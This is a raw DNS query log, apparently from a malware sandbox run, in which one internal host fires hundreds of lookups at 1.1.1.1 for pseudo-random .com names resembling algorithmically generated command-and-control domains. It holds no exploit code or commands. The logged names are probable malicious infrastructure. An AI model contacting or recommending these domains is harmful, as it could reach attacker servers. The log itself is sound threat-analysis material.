Aug 23, 2024 18:47:41.753565073 CEST	192.168.2.4	1.1.1.1	0x68d9	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.753772974 CEST	192.168.2.4	1.1.1.1	0x1a1d	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.754038095 CEST	192.168.2.4	1.1.1.1	0xf19d	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.881356955 CEST	192.168.2.4	1.1.1.1	0xab39	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.881624937 CEST	192.168.2.4	1.1.1.1	0xe957	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.882385969 CEST	192.168.2.4	1.1.1.1	0x9f14	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.882914066 CEST	192.168.2.4	1.1.1.1	0x5cdd	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.882914066 CEST	192.168.2.4	1.1.1.1	0x7126	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.883538008 CEST	192.168.2.4	1.1.1.1	0x8d54	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.883538008 CEST	192.168.2.4	1.1.1.1	0xb4e1	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.884310007 CEST	192.168.2.4	1.1.1.1	0x1181	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.884310007 CEST	192.168.2.4	1.1.1.1	0xa2d8	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.884846926 CEST	192.168.2.4	1.1.1.1	0x9dd	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.885016918 CEST	192.168.2.4	1.1.1.1	0x6ad5	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.885632038 CEST	192.168.2.4	1.1.1.1	0x713c	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.885761976 CEST	192.168.2.4	1.1.1.1	0x2791	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.886106968 CEST	192.168.2.4	1.1.1.1	0x64e	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.886816025 CEST	192.168.2.4	1.1.1.1	0x441a	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.886816025 CEST	192.168.2.4	1.1.1.1	0x58af	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.888113976 CEST	192.168.2.4	1.1.1.1	0x1641	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.888871908 CEST	192.168.2.4	1.1.1.1	0xc012	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.892385960 CEST	192.168.2.4	1.1.1.1	0x1fcb	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.895136118 CEST	192.168.2.4	1.1.1.1	0x49b3	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.895802975 CEST	192.168.2.4	1.1.1.1	0xba96	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.896006107 CEST	192.168.2.4	1.1.1.1	0xa770	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.896006107 CEST	192.168.2.4	1.1.1.1	0x356d	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.896193027 CEST	192.168.2.4	1.1.1.1	0x1e49	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.896339893 CEST	192.168.2.4	1.1.1.1	0x45d6	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.896339893 CEST	192.168.2.4	1.1.1.1	0x9344	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.896508932 CEST	192.168.2.4	1.1.1.1	0xe8d3	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.896508932 CEST	192.168.2.4	1.1.1.1	0x1e5e	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.896703959 CEST	192.168.2.4	1.1.1.1	0xcf28	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.896703959 CEST	192.168.2.4	1.1.1.1	0xa1e0	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.896852016 CEST	192.168.2.4	1.1.1.1	0x1937	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.897102118 CEST	192.168.2.4	1.1.1.1	0x1560	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.897102118 CEST	192.168.2.4	1.1.1.1	0xa5c4	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.897377014 CEST	192.168.2.4	1.1.1.1	0xd4f9	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.897377014 CEST	192.168.2.4	1.1.1.1	0x1686	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.897540092 CEST	192.168.2.4	1.1.1.1	0x7c47	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.897859097 CEST	192.168.2.4	1.1.1.1	0x1b7a	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.898081064 CEST	192.168.2.4	1.1.1.1	0xa9a2	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.899291992 CEST	192.168.2.4	1.1.1.1	0x7d66	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.902673006 CEST	192.168.2.4	1.1.1.1	0x69e2	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.903103113 CEST	192.168.2.4	1.1.1.1	0xc000	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.903443098 CEST	192.168.2.4	1.1.1.1	0x9bc5	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.903604984 CEST	192.168.2.4	1.1.1.1	0xa7f	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.904367924 CEST	192.168.2.4	1.1.1.1	0xf977	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.905278921 CEST	192.168.2.4	1.1.1.1	0x26e2	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.979331970 CEST	192.168.2.4	1.1.1.1	0x1d17	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.981563091 CEST	192.168.2.4	1.1.1.1	0xca4a	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.985554934 CEST	192.168.2.4	1.1.1.1	0x3497	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.987833977 CEST	192.168.2.4	1.1.1.1	0xcec1	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.989670038 CEST	192.168.2.4	1.1.1.1	0xadc7	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.990619898 CEST	192.168.2.4	1.1.1.1	0xab60	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.991178036 CEST	192.168.2.4	1.1.1.1	0xed0d	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.992166996 CEST	192.168.2.4	1.1.1.1	0x9918	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.992755890 CEST	192.168.2.4	1.1.1.1	0x19a6	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.993454933 CEST	192.168.2.4	1.1.1.1	0xbf25	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.994333029 CEST	192.168.2.4	1.1.1.1	0x62f	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.994452953 CEST	192.168.2.4	1.1.1.1	0xc6af	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.995203972 CEST	192.168.2.4	1.1.1.1	0x8200	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.996216059 CEST	192.168.2.4	1.1.1.1	0x57ae	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.997490883 CEST	192.168.2.4	1.1.1.1	0x9823	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.997490883 CEST	192.168.2.4	1.1.1.1	0xc3f	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.998322964 CEST	192.168.2.4	1.1.1.1	0xaf76	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.998997927 CEST	192.168.2.4	1.1.1.1	0xa527	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.002150059 CEST	192.168.2.4	1.1.1.1	0x7ce8	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.002808094 CEST	192.168.2.4	1.1.1.1	0x10fe	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.003793955 CEST	192.168.2.4	1.1.1.1	0xa07b	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.004897118 CEST	192.168.2.4	1.1.1.1	0x457b	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.005412102 CEST	192.168.2.4	1.1.1.1	0x51a1	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.006333113 CEST	192.168.2.4	1.1.1.1	0x9785	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.007215023 CEST	192.168.2.4	1.1.1.1	0x1089	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.007339954 CEST	192.168.2.4	1.1.1.1	0x874e	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.008735895 CEST	192.168.2.4	1.1.1.1	0xbcf0	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.009792089 CEST	192.168.2.4	1.1.1.1	0x4e64	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.010561943 CEST	192.168.2.4	1.1.1.1	0x1b3	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.011040926 CEST	192.168.2.4	1.1.1.1	0x2c6a	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.011498928 CEST	192.168.2.4	1.1.1.1	0x7576	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.012243032 CEST	192.168.2.4	1.1.1.1	0x2d18	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.024883032 CEST	192.168.2.4	1.1.1.1	0xc7b	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.663491964 CEST	192.168.2.4	1.1.1.1	0x7ce1	Standard query (0)	gahyraw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.664375067 CEST	192.168.2.4	1.1.1.1	0x8b7a	Standard query (0)	lyrygyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.705775976 CEST	192.168.2.4	1.1.1.1	0xb2fd	Standard query (0)	vocycuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.705976009 CEST	192.168.2.4	1.1.1.1	0x7c79	Standard query (0)	qegyrol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.706271887 CEST	192.168.2.4	1.1.1.1	0x2dd0	Standard query (0)	purygeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.706502914 CEST	192.168.2.4	1.1.1.1	0xc7a4	Standard query (0)	gacycus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.707025051 CEST	192.168.2.4	1.1.1.1	0x1c6f	Standard query (0)	lygywor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.707210064 CEST	192.168.2.4	1.1.1.1	0xe811	Standard query (0)	vowygem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.707700014 CEST	192.168.2.4	1.1.1.1	0x8902	Standard query (0)	qexyxuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.707916021 CEST	192.168.2.4	1.1.1.1	0x13de	Standard query (0)	pufywil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.725516081 CEST	192.168.2.4	1.1.1.1	0xace3	Standard query (0)	gaqyfah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.730881929 CEST	192.168.2.4	1.1.1.1	0xe732	Standard query (0)	lyxyxyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.731311083 CEST	192.168.2.4	1.1.1.1	0xe238	Standard query (0)	vofyqit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.731482029 CEST	192.168.2.4	1.1.1.1	0xe81b	Standard query (0)	qeqyfaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.731700897 CEST	192.168.2.4	1.1.1.1	0x5ca2	Standard query (0)	puzyxyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.731962919 CEST	192.168.2.4	1.1.1.1	0x2ce1	Standard query (0)	gadyquz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.732188940 CEST	192.168.2.4	1.1.1.1	0x8494	Standard query (0)	lymyfoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.732247114 CEST	192.168.2.4	1.1.1.1	0x37b	Standard query (0)	volyzef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.732429981 CEST	192.168.2.4	1.1.1.1	0xc55d	Standard query (0)	pumydoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.732547045 CEST	192.168.2.4	1.1.1.1	0x7922	Standard query (0)	qedyqup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.732743979 CEST	192.168.2.4	1.1.1.1	0x51dd	Standard query (0)	galyzeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.732875109 CEST	192.168.2.4	1.1.1.1	0xca77	Standard query (0)	lysymux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.733037949 CEST	192.168.2.4	1.1.1.1	0xcbf	Standard query (0)	vonydik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.733314991 CEST	192.168.2.4	1.1.1.1	0xb4ee	Standard query (0)	qekylag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.733608007 CEST	192.168.2.4	1.1.1.1	0x24f9	Standard query (0)	pupymyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.733783007 CEST	192.168.2.4	1.1.1.1	0xeb62	Standard query (0)	ganydiw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.733951092 CEST	192.168.2.4	1.1.1.1	0x7378	Standard query (0)	vopymyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.734122992 CEST	192.168.2.4	1.1.1.1	0xfd23	Standard query (0)	lykylan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.734457016 CEST	192.168.2.4	1.1.1.1	0x3ae2	Standard query (0)	qebysul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.734683037 CEST	192.168.2.4	1.1.1.1	0xd973	Standard query (0)	pujylog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.734829903 CEST	192.168.2.4	1.1.1.1	0x1ac6	Standard query (0)	gatynes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.735090971 CEST	192.168.2.4	1.1.1.1	0x1361	Standard query (0)	lyvysur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.735308886 CEST	192.168.2.4	1.1.1.1	0xad29	Standard query (0)	vojykom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.735466003 CEST	192.168.2.4	1.1.1.1	0x5c6	Standard query (0)	qetynev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.736140966 CEST	192.168.2.4	1.1.1.1	0x8c08	Standard query (0)	puvypul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.736345053 CEST	192.168.2.4	1.1.1.1	0x3ee4	Standard query (0)	vocypyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.736447096 CEST	192.168.2.4	1.1.1.1	0xfddb	Standard query (0)	lyrynad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.736603022 CEST	192.168.2.4	1.1.1.1	0xb536	Standard query (0)	gahykih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.736762047 CEST	192.168.2.4	1.1.1.1	0x84e	Standard query (0)	purybav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.736906052 CEST	192.168.2.4	1.1.1.1	0x2831	Standard query (0)	gacypyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.737046957 CEST	192.168.2.4	1.1.1.1	0x50be	Standard query (0)	qegykiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.747864008 CEST	192.168.2.4	1.1.1.1	0x91d7	Standard query (0)	vowybof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.748056889 CEST	192.168.2.4	1.1.1.1	0xe60b	Standard query (0)	lygyjuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.748241901 CEST	192.168.2.4	1.1.1.1	0xaa5b	Standard query (0)	pufyjuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.749372959 CEST	192.168.2.4	1.1.1.1	0xb549	Standard query (0)	gaqyvob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.749536037 CEST	192.168.2.4	1.1.1.1	0x84f8	Standard query (0)	qexytep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.749752998 CEST	192.168.2.4	1.1.1.1	0xdc55	Standard query (0)	lyxytex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.749887943 CEST	192.168.2.4	1.1.1.1	0xbd16	Standard query (0)	vofyjuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.750624895 CEST	192.168.2.4	1.1.1.1	0x727b	Standard query (0)	qeqyvig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.750786066 CEST	192.168.2.4	1.1.1.1	0x97cf	Standard query (0)	gadyhyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.750910044 CEST	192.168.2.4	1.1.1.1	0x9739	Standard query (0)	puzytap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.751107931 CEST	192.168.2.4	1.1.1.1	0xe363	Standard query (0)	volyrac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.751300097 CEST	192.168.2.4	1.1.1.1	0x780b	Standard query (0)	qedyhyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.751847982 CEST	192.168.2.4	1.1.1.1	0xf86f	Standard query (0)	lymyvin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.752116919 CEST	192.168.2.4	1.1.1.1	0xd1a0	Standard query (0)	pumycug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.752408981 CEST	192.168.2.4	1.1.1.1	0xcadf	Standard query (0)	galyros.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.753125906 CEST	192.168.2.4	1.1.1.1	0xea54	Standard query (0)	lysyger.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.753300905 CEST	192.168.2.4	1.1.1.1	0xcd10	Standard query (0)	qekyrov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.753458023 CEST	192.168.2.4	1.1.1.1	0x2894	Standard query (0)	vonycum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.753710985 CEST	192.168.2.4	1.1.1.1	0x2ff3	Standard query (0)	pupygel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.754631042 CEST	192.168.2.4	1.1.1.1	0x54a	Standard query (0)	ganycuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.754887104 CEST	192.168.2.4	1.1.1.1	0x55ab	Standard query (0)	lykywid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.755065918 CEST	192.168.2.4	1.1.1.1	0xad6e	Standard query (0)	qebyxyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.755208015 CEST	192.168.2.4	1.1.1.1	0x77da	Standard query (0)	vopygat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.888098001 CEST	192.168.2.4	1.1.1.1	0x441a	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.942323923 CEST	192.168.2.4	1.1.1.1	0xa362	Standard query (0)	pujywiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.943033934 CEST	192.168.2.4	1.1.1.1	0x6f04	Standard query (0)	gatyfaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.943610907 CEST	192.168.2.4	1.1.1.1	0x2cd4	Standard query (0)	lyvyxyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.950983047 CEST	192.168.2.4	1.1.1.1	0x6b3c	Standard query (0)	qetyfop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.951832056 CEST	192.168.2.4	1.1.1.1	0x4b08	Standard query (0)	vojyquf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.956535101 CEST	192.168.2.4	1.1.1.1	0xb58f	Standard query (0)	puvyxeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.956732988 CEST	192.168.2.4	1.1.1.1	0xea9d	Standard query (0)	gahyqub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.956890106 CEST	192.168.2.4	1.1.1.1	0x4b51	Standard query (0)	lyryfox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.957046986 CEST	192.168.2.4	1.1.1.1	0x7b4	Standard query (0)	vocyzek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.976017952 CEST	192.168.2.4	1.1.1.1	0x4f5	Standard query (0)	vowydic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.980382919 CEST	192.168.2.4	1.1.1.1	0x68df	Standard query (0)	purydip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.980714083 CEST	192.168.2.4	1.1.1.1	0x66f9	Standard query (0)	gacyzaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.980848074 CEST	192.168.2.4	1.1.1.1	0x62c6	Standard query (0)	lygymyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.981100082 CEST	192.168.2.4	1.1.1.1	0xcdc1	Standard query (0)	pufymyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.981374025 CEST	192.168.2.4	1.1.1.1	0x6c7d	Standard query (0)	gaqydus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.003557920 CEST	192.168.2.4	1.1.1.1	0x25bd	Standard query (0)	lyxylor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.009031057 CEST	192.168.2.4	1.1.1.1	0xd015	Standard query (0)	qexylal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.009140015 CEST	192.168.2.4	1.1.1.1	0x31c4	Standard query (0)	qeqysuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.009397030 CEST	192.168.2.4	1.1.1.1	0x35cd	Standard query (0)	puzylol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.009560108 CEST	192.168.2.4	1.1.1.1	0x1ac5	Standard query (0)	vofymem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.009839058 CEST	192.168.2.4	1.1.1.1	0xcb2f	Standard query (0)	lymysud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.010021925 CEST	192.168.2.4	1.1.1.1	0x8c6e	Standard query (0)	gadyneh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.010262012 CEST	192.168.2.4	1.1.1.1	0x2fc9	Standard query (0)	volykit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.010462046 CEST	192.168.2.4	1.1.1.1	0xb7e6	Standard query (0)	qedynaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.010718107 CEST	192.168.2.4	1.1.1.1	0xbe94	Standard query (0)	pumypyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.010967016 CEST	192.168.2.4	1.1.1.1	0x8976	Standard query (0)	galykiz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.011208057 CEST	192.168.2.4	1.1.1.1	0x51f7	Standard query (0)	lysynaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.011507034 CEST	192.168.2.4	1.1.1.1	0x938	Standard query (0)	vonypyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.014025927 CEST	192.168.2.4	1.1.1.1	0xe6dd	Standard query (0)	qekykup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.014755964 CEST	192.168.2.4	1.1.1.1	0x4af3	Standard query (0)	pupyboq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.014945030 CEST	192.168.2.4	1.1.1.1	0x4	Standard query (0)	ganypeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.015314102 CEST	192.168.2.4	1.1.1.1	0xcffa	Standard query (0)	vopybok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.015784025 CEST	192.168.2.4	1.1.1.1	0xbfb6	Standard query (0)	lykyjux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.042067051 CEST	192.168.2.4	1.1.1.1	0xef5d	Standard query (0)	qebyteg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.042439938 CEST	192.168.2.4	1.1.1.1	0x1c2d	Standard query (0)	pujyjup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.042609930 CEST	192.168.2.4	1.1.1.1	0xf101	Standard query (0)	gatyviw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.065406084 CEST	192.168.2.4	1.1.1.1	0xe67b	Standard query (0)	vojyjyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.065756083 CEST	192.168.2.4	1.1.1.1	0x164d	Standard query (0)	puvytag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.065927029 CEST	192.168.2.4	1.1.1.1	0x5541	Standard query (0)	qetyvil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.066067934 CEST	192.168.2.4	1.1.1.1	0x1288	Standard query (0)	lyvytan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.066203117 CEST	192.168.2.4	1.1.1.1	0x8065	Standard query (0)	gahyhys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.066406012 CEST	192.168.2.4	1.1.1.1	0xd6d8	Standard query (0)	vocyrom.com	A (IP address)	IN (0x0001)	false
